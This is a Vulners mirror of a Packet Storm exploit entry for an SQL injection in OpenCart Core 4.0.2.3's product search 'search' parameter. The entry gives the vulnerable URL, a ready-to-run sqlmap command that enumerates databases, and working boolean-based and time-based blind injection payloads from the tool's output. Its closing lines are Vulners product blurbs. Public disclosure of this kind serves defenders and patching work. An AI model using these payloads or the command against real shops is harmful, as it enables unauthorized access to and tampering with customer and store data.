Lucene search
K

OpenCart Core 4.0.2.3 SQL Injection

🗓️ 02 Apr 2024 00:00:00Reported by Saud AlenaziType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 287 Views

OpenCart Core 4.0.2.3 SQL Injection via 'search' parameter in product searc

Code
`# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi  
# Date: 2024-04-2  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.opencart.com/  
# Software Link: https://github.com/opencart/opencart/releases  
# Version: 4.0.2.3  
# Tested on: XAMPP, Linux  
# Contact: https://twitter.com/dmaral3noz  
* Description :  
Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.  
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.  
* Steps to Reproduce :  
- Go to : http://127.0.0.1/index.php?route=product/search&search=test  
- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs  
===========  
Output :  
Parameter: search (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: route=product/search&search=') AND 2427=2427-- drCa  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation